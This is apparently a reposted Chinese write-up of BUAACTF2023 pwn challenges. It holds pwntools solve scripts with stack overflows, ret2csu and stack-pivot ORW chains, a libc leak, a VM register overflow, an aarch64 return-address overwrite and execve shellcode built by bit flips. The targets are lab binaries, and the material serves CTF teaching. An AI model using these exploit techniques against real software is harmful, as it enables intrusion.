NLP
出题思路:考察Pwntools交互功能使用和正则表达式知识
解题思路:学习使用Pwntools,编写合理正则表达式语法解题即可
- 使用pwntools连接题目服务器。
- 根据题目给定的加法、减法和乘法问题,利用pwntools的recv和send功能接收问题并发送正确答案。
- 分析题目要求,利用正则表达式提取各种信息,包括电话、邮箱、URL、日期、IP地址、身份证号、薪资和工作时间等。
- 若成功通过两个测试,服务器将返回flag。
本题主要目的是教授大家如何使用pwntools编写exp脚本并运用正则表达式解决实际问题。通过本题,大家应该能够学会基本的pwntools操作和正则表达式的应用,为以后解决更复杂的pwn题打下基础。同时,本题还涉及到一些爬虫元素,使题目更加贴近实际应用场景。
from pwn import *
import re
# Pre-compiled extractors for the fields requested in the "Generated Ad" rounds.
# The regex escapes (\b, \d, \S, \.) had been stripped from the published
# listing; they are restored here. Raw strings keep the backslashes intact.
phone_pattern = re.compile(r'\b\d{11}\b')  # exactly 11 digits between word boundaries
email_pattern = re.compile(r'[a-zA-Z0-9._%+-]+@(?:[a-zA-Z0-9-]+\.)+[a-zA-Z]{2,6}')
url_pattern = re.compile(r'https?://\S+')  # runs until the next whitespace
date_pattern = re.compile(r'\d{4}年\d{1,2}月\d{1,2}日')
# Literal dots are required; an unescaped "." would also match long digit runs.
ip_pattern = re.compile(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}')
id_pattern = re.compile(r'110\d{14}[0-9X]')  # 18 characters, prefix 110
salary_pattern = re.compile(r'\d+k-\d+k')
time_pattern = re.compile(r'\d{1,2}:\d{1,2}-\d{1,2}:\d{1,2}')
# Maps the first six characters of an ID number to a district name.
# NOTE(review): 110228 / 110229 look like older county-era codes paired with
# the newer "区" names; presumably this mirrors the challenge server's own
# table, so it is kept as-is — confirm before changing.
region_dict = {
    '110101': '东城区',
    '110102': '西城区',
    '110105': '朝阳区',
    '110106': '丰台区',
    '110107': '石景山区',
    '110108': '海淀区',
    '110109': '门头沟区',
    '110111': '房山区',
    '110112': '通州区',
    '110113': '顺义区',
    '110114': '昌平区',
    '110115': '大兴区',
    '110116': '怀柔区',
    '110117': '平谷区',
    '110228': '密云区',
    '110229': '延庆区',
}

# Keyed by the parity (as a string) of the ID number's 17th digit.
gender_dict = {
    '0': '女',
    '1': '男',
}
def get_id_info(id):
    """Describe an 18-character ID number as region, birthday and gender.

    Args:
        id: The ID string, e.g. one matched by ``id_pattern``. The parameter
            name is kept for compatibility although it shadows the builtin.

    Returns:
        A string of the form
        ``"<id> (地区: <region>, 生日: <Y>年<M>月<D>日, 性别: <男|女>)"``.
        ``region`` renders as ``None`` when the six-character prefix is not
        in ``region_dict``.

    Raises:
        ValueError: If the birthday or gender positions are not digits.
    """
    region = region_dict.get(id[0:6])
    # int() drops leading zeros, so "03" is rendered as "3".
    year = int(id[6:10])
    month = int(id[10:12])
    day = int(id[12:14])
    birthday = f'{year}年{month}月{day}日'
    # Index 16 is the 17th character; its parity selects the gender entry.
    gender_code = int(id[16:17])
    gender = gender_dict[str(gender_code % 2)]
    return f"{id} (地区: {region}, 生日: {birthday}, 性别: {gender})"
def process_ad(ad):
    """Extract every requested field from one advertisement line.

    Args:
        ad: The advertisement text received from the server.

    Returns:
        A single line ``"电话: ... | 邮箱: ... | URL: ... | 日期: ... | IP: ...
        | 身份证: ... | 薪资: ... | 工作时间: ..."`` in which the matches of each
        field are joined by ``", "``; a field with no match is left empty.
    """
    # Each ID is expanded with its region/birthday/gender description.
    ids_info = [get_id_info(id_number) for id_number in id_pattern.findall(ad)]
    fields = (
        ('电话', phone_pattern.findall(ad)),
        ('邮箱', email_pattern.findall(ad)),
        ('URL', url_pattern.findall(ad)),
        ('日期', date_pattern.findall(ad)),
        ('IP', ip_pattern.findall(ad)),
        ('身份证', ids_info),
        ('薪资', salary_pattern.findall(ad)),
        ('工作时间', time_pattern.findall(ad)),
    )
    return ' | '.join(f"{label}: {', '.join(values)}" for label, values in fields)
context.arch = 'amd64'
context.os = 'linux'
context.log_level = 'debug'

conn = remote('127.0.0.1', 23335)

# Stage 1: twenty arithmetic rounds. Each round announces numberA and numberB
# on separate lines and then asks for a + b, a * b or a - b.
for _ in range(20):
    conn.recvuntil(b"round")
    conn.recvline()
    # Raw bytes patterns: the tube returns bytes and \d must reach the regex engine.
    a = int(re.search(rb'numberA = :(\d+)', conn.recvline()).group(1))
    b = int(re.search(rb'numberB = :(\d+)', conn.recvline()).group(1))
    getline = conn.recvuntil(b": ")
    # Tubes carry bytes, so the answers are encoded explicitly.
    if b"please tell me answer a + b: " in getline:
        conn.sendline(str(a + b).encode())
    elif b"please tell me answer a * b: " in getline:
        conn.sendline(str(a * b).encode())
    elif b"please tell me answer a - b: " in getline:
        conn.sendline(str(a - b).encode())
# conn.interactive()

# Stage 2: twenty extraction rounds. The advertisement is the single line
# that follows the "Generated Ad:" header.
for _ in range(20):
    conn.recvuntil(b"round")
    conn.recvuntil(b"Generated Ad:\n")
    ad = conn.recvuntil(b"\n", drop=True).decode()
    extracted_info = process_ad(ad)
    # The answer contains non-ASCII text; send it as UTF-8.
    conn.sendline(extracted_info.encode())
conn.interactive()
# flag{R3gEx_Ma5t3r_4nd_Pwnt00ls_Exprt!}
pirate
海盗分金问题+简单栈溢出
from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
context.os = 'linux'
#p=process('./pirate')
#gdb.attach(p)
p = remote('0.0.0.0', 8080)

# The banner gives the number of other pirates and the number of coins.
p.recvuntil(b'Boom~! You are a pirate, and now you and ')
n = int(p.recvuntil(b' ', drop=True).decode()) + 1  # +1 to count ourselves
p.recvuntil(b'other pirates have ')
m = int(p.recvuntil(b' ', drop=True).decode())

# Pirate-game split: the first answer is everything left after handing one
# coin to every other remaining pirate.
coins = m - (n - 1) // 2
p.sendlineafter(b'How many coins you will give to pirate No.1:', str(coins).encode())
for i in range(2, n + 1):
    # One coin for pirates whose distance from the end has the same parity as n.
    if ((n + 1 - i) & 1) == (n & 1):
        p.sendlineafter(b':', b'1')
    else:
        p.sendlineafter(b':', b'0')

# Stack overflow in the final message: 16 filler bytes followed by two
# addresses inside the challenge binary.
# NOTE(review): presumably a stack-alignment gadget and the win function —
# confirm against the binary.
p.sendlineafter(
    b'Now you can give all of your gold coins to me, and say something.\n',
    p64(0) * 2 + p64(0x401621) + p64(0x401236),
)
#pause()
p.interactive()
# BUAACTF{Y0u_4r3_th3_k1ng_0f_p1r4t3}
noshell
orw+栈迁移+ret2csu
from pwn import *
# Configure pwntools once: verbose tube logging, 64-bit Linux target.
context.update(log_level='debug', arch='amd64', os='linux')
def ret2csu(func, rdi, rsi, rdx):
    """Build one ret2csu frame that calls ``*func(rdi, rsi, rdx)``.

    The frame is meant to be placed directly after the address of the
    pop gadget (``csu_addr``) or after a previous frame.

    Args:
        func: Address of a memory slot holding the function pointer to call.
        rdi: First argument.
        rsi: Second argument.
        rdx: Third argument.

    Returns:
        The packed frame as bytes, ending with the address of the call gadget.
    """
    # Slot order: filler, 0, 1, rdi, rsi, rdx, func.
    # NOTE(review): presumably filler for `add rsp, 8`, then rbx=0, rbp=1,
    # r12, r13, r14, r15 of the __libc_csu_init pop sequence — confirm
    # against the binary.
    payload = p64(0) + p64(0) + p64(1) + p64(rdi) + p64(rsi) + p64(rdx) + p64(func)
    # 0x401350: call gadget of this binary (moves the registers, then calls).
    payload += p64(0x401350)
    return payload
p = process('./noshell')
#gdb.attach(p)
libc = ELF('./libc-2.31.so')
elf = ELF('./noshell')

# Addresses inside the challenge binary.
leave_ret_addr = 0x40130b
rdi_addr = 0x401373
num_addr = 0x404080   # buffer filled by the "gift" prompt
csu_addr = 0x401366
puts_got = 0x404018
puts_plt = elf.plt['puts']
read_got = 0x404020
main_addr = 0x401270

# Round 1: store the file name, then leak read() through puts and return to main.
payload = b'./flag\x00\x00'
p.sendafter(b'Let me give you a gift~\n', payload)
p.sendafter(
    b'Can you get shell now?\n',
    p64(0) + p64(num_addr + 24) + p64(rdi_addr) + p64(read_got) + p64(puts_plt) + p64(main_addr),
)
# Keep only the six address bytes ending in 0x7f so that any bytes received
# before the leak cannot break u64().
leak = p.recvuntil(b'\x7f')[-6:]
libcbase = u64(leak.ljust(8, b'\x00')) - libc.symbols['read']
print(hex(libcbase))
read_addr = libcbase + libc.symbols['read']
write_addr = libcbase + libc.symbols['write']
open_addr = libcbase + libc.symbols['open']

# Round 2: the gift buffer now holds "./flag", an open/read/write ret2csu
# chain, and a pointer table at +0x100 that the chain calls through.
payload += p64(csu_addr)
payload += ret2csu(num_addr + 0x100, num_addr, 0, 0)               # open("./flag", 0, 0)
payload += ret2csu(num_addr + 0x108, 3, num_addr + 0x120, 0x30)    # read(3, buf, 0x30)
payload += ret2csu(num_addr + 0x110, 1, num_addr + 0x120, 0x30)    # write(1, buf, 0x30)
payload = payload.ljust(0x100, b'\x00')
payload += p64(open_addr) + p64(read_addr) + p64(write_addr)
p.sendafter(b'Let me give you a gift~\n', payload)
# Stack pivot: saved rbp = num_addr, then `leave; ret` continues from the buffer.
p.sendafter(b'Can you get shell now?\n', p64(0) + p64(num_addr) + p64(leave_ret_addr))
p.interactive()
#pause()
#BUAACTF{Y0u_4r3_th3_m4st3r_0f_0rw_4nd_st4ck}
ezvm
用户输入虚拟机指令,以使寄存器向上溢出到返回地址,跳转到后面函数即可get shell
from pwn import *
io = process("./challenge")

# Opcodes of the challenge VM.
HALT = 0
LD = 1


def _word(value):
    """Encode one VM word as a 4-byte little-endian integer."""
    return (value & 0xffffffff).to_bytes(4, 'little')


# Per the write-up, loading into register indexes past the register file
# overwrites the return address.
# NOTE(review): presumably indexes 26 and 27 are the low and high halves of
# the saved return address — confirm in a debugger.
_program = (
    (LD, 26, 0x401921),
    (LD, 27, 0),
    (HALT,),
)
payload = b''.join(_word(word) for instruction in _program for word in instruction)
# io.recv()
io.sendline(payload)
io.interactive()
# BUAACTF{Remenber to fill this after the end of competition}
rtROP
关键函数的定位
根据 qemu 命令可知是 aarch64 架构,在 IDA64 中打开,选择 ARM 架构,并选择 64 位程序
在 `qemu-run.sh` 的末尾增加 `-gdb tcp::12345`,运行后在 IDA 中选择 Remote GDB debugger 对代码进行调试
调试后可以记住一些特殊字节(例如字符串)的地址,来算出基地址,并使用 `Edit -> segments -> rebase program` 功能更改基地址
设置好正确的基地址后,即可通过 `Edit -> Select all` 后右键选择 `Edit -> Code` 功能进行自动分析
在字符串中可以看到
ROM:00000000400CEE22 00 00 00 00 00 00 DCW 0, 0, 0
ROM:00000000400CEE28 42 55 41 41 43 54 46 7B 78 78+aBuaactfXxxxxxx DCB "BUAACTF{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}",0xA,0
ROM:00000000400CEE28 78 78 78 78 78 78 2D 78 78 78+ ; DATA XREF: sub_400BAF08+8↑o
跳转到 sub_400BAF08
后发现
/* Backdoor routine: passes the flag string to sub_400BC414 (presumably a
 * printf-like routine) and hands the result to sub_400AEF88. */
__int64 sub_400BAF08()
{
    __int64 v0; // x0

    /* The string at 0x400CEE28 ends with byte 0xA in the IDA listing, so the
     * literal ends with "\n". */
    v0 = sub_400BC414("BUAACTF{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\n");
    return sub_400AEF88(v0);
}
该函数为一个后门函数
此外可以根据交叉引用,找到
ROM:00000000400C81D0 38 05 0D 40 00 00 00 00 DCQ aGetFlag ; "get_flag"
ROM:00000000400C81D8 48 05 0D 40 00 00 00 00 DCQ aGetTheFlag ; "get the flag..."
ROM:00000000400C81E0 B0 4F 0A 40 00 00 00 00 DCQ sub_400A4FB0
说明 `sub_400A4FB0` 函数即为 `get_flag` 函数
该函数也可以通过调试的方法找到,思路为:在程序中输入 `get_flag`,并输入 Input 内容,但不输入回车,此时在 IDA 中搜索程序内存,可以找到自己的 Input 内容,此时通过下硬件断点(最好在中间的某个字节下断点)的方法找到该内存被访问的地方,并逐步跟踪
get_flag 函数漏洞分析与利用
分析发现,函数的如下部分为获取输入内容(此处也可以结合动调分析):
while ( 1 )
{
sub_4008F274(0i64, &v28, 1i64);
*v38 = v28;
sub_400BC414("%c", v28, v8, v9, v10, v11, v12, v13);
if ( v28 == 10 || v28 == 13 )
break;
++v38;
++v37;
}
根据该函数内容可知,只有当输入内容为 `\n`(或 `\r`)时,该函数才会停止接收数据,循环中没有任何长度检查,因此存在溢出漏洞
查看函数的栈,发现该输入内容并非位于栈底,在覆盖过程中将会影响其他变量
_BYTE v34[68]; // [xsp+108h] [xbp+108h] BYREF
unsigned int i; // [xsp+14Ch] [xbp+14Ch]
int v36; // [xsp+150h] [xbp+150h]
unsigned int v37; // [xsp+154h] [xbp+154h]
unsigned __int8 *v38; // [xsp+158h] [xbp+158h]
其中,`v34` 为输入开始处,因此在溢出后,将会影响 `i`、`v36`、`v37`、`v38` 四个变量。后续代码中,`i` 与 `v36` 两个变量均被重新赋值,因此实际上不存在影响;而 `v37` 与 `v38` 是输入循环中的重要变量,分别存储了输入的总长度与当前输入的位置
考虑到后续会对输入内容进行 AES 加密,可以通过减小总长度的方式,避免最后的 ROP 内容被加密;此外,可以通过修改 `v38` 指针的末尾字节,将输入的指针直接指向目标位置
使用 gdb-multiarch
动调查看栈地址
输入 target remote 127.0.0.1:12345
进行远程调试
在获取用户输入后的地址下断点,查看栈地址
pwndbg> stack 50
00:0000│ x29 sp 0x401ff940 —▸ 0x401ffaa0 —▸ 0x401ffb40 —▸ 0x401ffb70 ◂— 0x1d
01:0008│ 0x401ff948 —▸ 0x400a349c ◂— mov w1, w0 /* 0xf9400fa02a0003e1 */
02:0010│ 0x401ff950 —▸ 0x401ffad8 —▸ 0x401fe92a ◂— 'get_flag'
03:0018│ 0x401ff958 ◂— 0x1400e9038
04:0020│ 0x401ff960 —▸ 0x401ff990 ◂— 'Input your flag: /> '
05:0028│ 0x401ff968 —▸ 0xd000000400995b0 ◂— ldr x0, [x29, #0x20] /* 0x91000400f94013a0 */
06:0030│ 0x401ff970 ◂— 0xeacb8d848598bd
07:0038│ 0x401ff978 ◂— 0x0
08:0040│ 0x401ff980 ◂— 0xfda8bfb9aeaeb39f
09:0048│ 0x401ff988 ◂— 0xdc
0a:0050│ 0x401ff990 ◂— 'Input your flag: /> '
0b:0058│ 0x401ff998 ◂— 'ur flag: /> '
0c:0060│ 0x401ff9a0 ◂— 0x203e2f20 /* ' /> ' */
0d:0068│ 0x401ff9a8 ◂— 0x1e2d0d2c06175c8
0e:0070│ 0x401ff9b0 ◂— 0x4ad0ea3b4b53c9c7
0f:0078│ 0x401ff9b8 ◂— movz w17, #0x531d, lsl #16 /* 0x63b7dfd052aa63b1 */
10:0080│ 0x401ff9c0 ◂— adr x19, #0x401da891 /* 0x8dae143b30ed7693 */
11:0088│ 0x401ff9c8 ◂— 0x7f38a0a369b0cdb2
12:0090│ 0x401ff9d0 ◂— 0x811ffb0ff7d60ef2
13:0098│ 0x401ff9d8 ◂— 0x684a8d4c82cfcb28
14:00a0│ 0x401ff9e0 ◂— 0x2ffc24c6de94f309
15:00a8│ 0x401ff9e8 ◂— 0x0
... ↓ 11 skipped
21:0108│ 0x401ffa48 ◂— 'AAAAAAAAAAAAAAAA\r'
22:0110│ 0x401ffa50 ◂— 'AAAAAAAA\r'
23:0118│ 0x401ffa58 ◂— 0xd /* '\r' */
24:0120│ 0x401ffa60 ◂— 0x0
... ↓ 4 skipped
29:0148│ 0x401ffa88 ◂— 0x1500000001
2a:0150│ 0x401ffa90 ◂— 0x1000000008
2b:0158│ 0x401ffa98 —▸ 0x401ffa58 ◂— 0xd /* '\r' */
2c:0160│ 0x401ffaa0 —▸ 0x401ffb40 —▸ 0x401ffb70 ◂— 0x1d
2d:0168│ 0x401ffaa8 —▸ 0x400a3534 ◂— cmp w0, #0 /* 0x540000617100001f */
2e:0170│ 0x401ffab0 ◂— 0x0
2f:0178│ 0x401ffab8 —▸ 0x401ffb64 ◂— 0x700000000
30:0180│ 0x401ffac0 ◂— 0x8
31:0188│ 0x401ffac8 —▸ 0x401fe92a ◂— 'get_flag'
结果如上,输入地址为 0x401ffa48
在 Arm 环境中,函数的返回地址存储在栈顶,因此在当前情况下,很难对当前函数的返回地址进行覆盖,然而,可以通过修改上一层函数的栈顶(即位于当前函数栈底)的值,控制再下一次跳转的结果
因此,可以在输入至 `0x401ffa98` 时,将该指针指向 `0x401ffaa7`,以此来控制后续的函数跳转
Payload
根据上述思路构造的 Payload 如下:
# Layout, following the stack variables listed earlier in this write-up:
#   68 bytes  fill v34 (the input buffer)
#   4 + 4     overwrite i and v36, which are reassigned later anyway
#   4 zeros   reset v37 (input length) so the tail is not AES-encrypted
#   0xa7      low byte of v38; after the loop's ++v38 the next byte is
#             stored at 0x401ffaa8, the caller's saved return address
#   p32(...)  address of the backdoor sub_400BAF08
payload = b'a' * 68 + b'b' * 4 + b'c' * 4 + b'\x00' * 4 + b'\xa7' + p32(0x400baf08)
# BUAACTF{9d88be72-5577-cbe6-8583-c696947baa6a}
one_chance
单字节构造rop+栈溢出
修改exit的got表1个bit,使程序流在main函数中产生循环,可以达到任意地址写的效果,然后写shellcode进行跳转。
#!/usr/bin/env python3
from pwn import *
context.log_level = 'debug'
#r = remote('10.212.27.23', 12138)
r = process("./one_chance")
# r.recvuntil("token: ")
# gdb needs the 0x prefix: a bare "40127C" is not a valid number for `b *`.
gdb.attach(r, "b *0x40127C")
sleep(1)  # give the debugger time to attach before the first interaction
def flip(addr, bit):
    """Ask the target to flip one bit.

    Waits for the ``slip?`` prompt on the global tube ``r`` and sends
    ``"<hex address> <bit index>"``.

    Args:
        addr: Address of the byte to modify.
        bit: Index of the bit to flip inside that byte.
    """
    # Tubes carry bytes, so both the prompt and the answer are bytes.
    r.recvuntil(b'slip?')
    r.sendline(f'{hex(addr)} {bit}'.encode())
target = 0x401286
# First flip: per the write-up, changing this single bit makes main loop, so
# the one-bit flip can be repeated as often as needed.
flip(target + 1, 6)

shellcode_start = 0x4010C0
# 27-byte shellcode with its \x escapes restored.
shellcode = (
    b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53"
    b"\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
)
e = ELF('./one_chance')
# Turn the bytes already at shellcode_start into the shellcode by flipping
# only the bits that differ.
for i, wanted in enumerate(shellcode):
    diff = wanted ^ e.read(shellcode_start + i, 1)[0]
    for j in range(8):
        if (diff >> j) & 1:
            flip(shellcode_start + i, j)

# Flip the first bit back.
# NOTE(review): presumably this ends the loop and lets execution reach the
# patched bytes — confirm in the debugger.
flip(target + 1, 6)
r.interactive()
easy-auto-pwn
找了一个有意思的题,现在主流的二进制研究手段离不开afl等fuzz工具,希望选手能够通过这一道简单的auto-pwn题去了解fuzz技术和工具
这个题是2020wdb玄武中fast的原题,选手做完pow后系统会自动编译一份代码并且搭建pwn环境下发端口,选手需要在极短的时间内完成100个函数的快速查找,目前网上没有特别好的题解,能解题的样例如附件所示,鼓励解题者去探索用angr等逆向辅助工具以及fuzz工具和技术快速求解。
from pwn import *
# Manual preparation of the downloaded challenge binary, in order:
#base64 -d
#tar -xvf
#upx -d
# Local run, kept for reference:
# p = process("./pwn")
# Remote instance; the host and port are specific to one challenge session.
p = remote("39.107.108.120", 36774)
# elf = ELF("./pwn")
# raw = elf.read(0x400000,0x36f00)
# start1= "x55x48x89xe5x8bx05"
# start2= "x55x48x89xe5x48x81"
# function_list = []
# offset = raw.find(start1)
# while offset != -1:
# function_list.append(offset+0x400000)
# offset = raw.find(start1,offset+1)
# magic = raw.find(start2,offset+1)+0x400000
# next_calls=[]
# function={}
# for i in function_list:
# func_id_address=i+0x13
# function_id=0
# num=0
# if elf.data[func_id_address-0x400000:func_id_address-0x400000+2]=="x85xc0":
# function_id=0
# num=0x5c
# elif elf.data[func_id_address-0x400000]=="x3d":
# function_id=u32(elf.data[func_id_address-0x400000+1:func_id_address-0x400000+4+1])
# num=0x5f
# else:
# function_id=u32(elf.data[func_id_address-0x400000+2]+"x00x00x00")
# num=0x5d
# function[function_id]=i
# call_func=[]
# for j in range(11):
# call_asm=i+num+j*0xc
# tmp=u32(elf.data[call_asm-0x400000+1:call_asm-0x400000+4+1])
# tmp_addr=call_asm+5
# if tmp>0x80000000:
# tmp=tmp-0x100000000
# next_func=call_asm+5+tmp
# call_func.append(next_func)
# next_calls.append(call_func)
# print next_calls
# ans=""
# for i in range(999):
# current=function[i]
# next=function[i+1]
# ans+=str(next_calls[function_list.index(current)].index(next))
# ans+=str(next_calls[function_list.index(function[999])].index(magic))
# print ans
# Precomputed input for one specific binary instance.
# NOTE(review): presumably the `ans` digit string printed by the analysis
# script, written here as an integer literal — confirm.
p.sendline(str(5642460770963085094263401006427226829824582648788972201687858596715764335873388505294553734415906820856685793867330464199188121660361594459266801634437725223305747333964063836221118617713973323087720089375299389031532671868683780981031731935996756825573772579463061725706333478408182656978574579973718380185650569294353041146262112140275573058539788078859479036709722507526119823691777908279452929141519092731592295973279954603974037860646900438648325631513292829589191867666573581406911452044279144710140044322291755989935450575934073873712815842124123493591061204373380095898340907469300409228519122074828549956626166035706722457669001506860895909587157837327607853233247164576750761862868365100337782901439502649554358765659299839991676541686432618735090040578275693744848979816168549677442520912859807250604061432264043915937134496012629857998064927460081555363609148473222492560051972133682084275782560892776105040156685553266429040684058854193541606205215023744883523412050746444226589612403429))
p.interactive()
From eurus:
先有一个6位的爆破,会收到base64编码的二进制文件和远程端口
二进制文件需要解压再upx脱壳才能得到能自动化分析的elf文件
里面有很多类似这样的函数
/* Decompiled dispatcher, shown as an example of the many similar functions
 * in the binary. It bumps the global call counter, then selects one of
 * eleven call targets with a switch; case 2 reaches overflow(). */
ssize_t __fastcall sub_42B39C(__int64 a1,__int64 a2)
{
int v2; // eax
ssize_t result; // rax
/* v2 holds the counter value from before the increment. */
v2 = dword_64B0AC++;
/* As listed, the process exits when that value equals 999.
 * NOTE(review): the write-up text describes exiting when the counter does
 * NOT equal the expected value — confirm which comparison the binary uses. */
if( v2 == 999 )
exit(-1);
sub_400868();
/* Ten numbered cases plus a default: eleven possible targets. */
switch((unsigned int)off_43EA9C )
{
case 0u:
result = sub_40D5EC(a1,a2);
break;
case 1u:
result = sub_42514E(a1,a2);
break;
case 2u:
result = overflow();
break;
case 3u:
result = sub_429A63(a1,a2);
break;
case 4u:
result = sub_412CF4(a1,a2);
break;
case 5u:
result = sub_41BF24(a1,a2);
break;
case 6u:
result = sub_40C2D2(a1,a2);
break;
case 7u:
result = sub_423FE8(a1,a2);
break;
case 8u:
result = sub_413D7D(a1,a2);
break;
case 9u:
result = sub_433709(a1,a2);
break;
default:
result = sub_427798(a1,a2);
break;
}
return result;
}
存在一个函数可以进行溢出
/* Decompiled target function of the challenge: requires a newline, prints a
 * banner, then reads far more data than its stack frame can hold. The
 * overflow is the challenge's intended bug and is reproduced as-is. */
ssize_t overflow()
{
    char buf; // [rsp+0h][rbp-D0h]
    char v2; // [rsp+CFh][rbp-1h]

    /* The next input character must be '\n' (10), otherwise the process exits. */
    v2 = getchar();
    if( v2 != 10 )
        exit(-1);
    /* 0x10 bytes: 15 visible characters plus the trailing "\n". */
    write(1,"WOw,U R GREAT !\n",0x10uLL);
    /* Up to 0x200 bytes are read into a buffer that sits 0xD0 bytes below rbp. */
    return read(0,&buf,0x200uLL);
}
由于每一个函数dword_64B0AC不等于特定值程序就会直接退出,所以程序的跳转流程其实是确定的
可以通过特定字节匹配函数,然后匹配跳转指令提取每个函数的跳转条件和对应的dword_64B0AC值,再分析输入
exp
只包含分析输入的过程,不包含解压、upx脱壳和溢出拿shell的过程
from pwn import *
#base64 -d
#tar -xvf
#upx -d
# Python 3 version of the analysis: every byte pattern is a bytes literal,
# because ELF.read() and ELF.data return bytes and never compare equal to str.
BASE = 0x400000  # the script treats file offset as (virtual address - BASE)
elf = ELF("./faster1")
raw = elf.read(BASE, 0x36f00)
start1 = b"\x55\x48\x89\xe5\x8b\x05"  # prologue bytes of the dispatcher functions
start2 = b"\x55\x48\x89\xe5\x48\x81"  # prologue bytes of overflow()

# Record the address of every dispatcher function.
function_list = []
offset = raw.find(start1)
while offset != -1:
    function_list.append(offset + BASE)
    offset = raw.find(start1, offset + 1)
# offset is -1 once the loop ends, so this search starts at the image start.
magic = raw.find(start2, offset + 1) + BASE

next_calls = []
function = {}
for i in function_list:
    # File offset of the instruction that compares the global call counter.
    id_off = i + 0x13 - BASE
    # The comparison's encoding gives both the expected counter value and the
    # distance from the function start to the first call.
    # NOTE(review): presumably `test eax, eax`, `cmp eax, imm32` and
    # `cmp eax, imm8` respectively — confirm in a disassembler.
    if elf.data[id_off:id_off + 2] == b"\x85\xc0":
        function_id = 0
        num = 0x5c
    elif elf.data[id_off:id_off + 1] == b"\x3d":
        function_id = u32(elf.data[id_off + 1:id_off + 5])
        num = 0x5f
    else:
        function_id = u32(elf.data[id_off + 2:id_off + 3] + b"\x00\x00\x00")
        num = 0x5d
    function[function_id] = i

    # Resolve the eleven call targets; position j is the input that selects it.
    call_func = []
    for j in range(11):
        call_asm = i + num + j * 0xc
        rel = u32(elf.data[call_asm - BASE + 1:call_asm - BASE + 5])
        # rel32 is signed; 0x80000000 itself is already negative.
        if rel >= 0x80000000:
            rel -= 0x100000000
        call_func.append(call_asm + 5 + rel)
    next_calls.append(call_func)
print(next_calls)

# Walk the chain: from the function expecting counter k, choose the input that
# calls the function expecting k + 1; the last function must call overflow().
calls_of = dict(zip(function_list, next_calls))
steps = [calls_of[function[k]].index(function[k + 1]) for k in range(999)]
steps.append(calls_of[function[999]].index(magic))
ans = "".join(map(str, steps))
print(ans)
文案 | 高丰奕
排版 | 张 涔
审核 | 潘卓成
原文始发于微信公众号(赛博安全社团):BUAACTF2023 Pwn WP
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论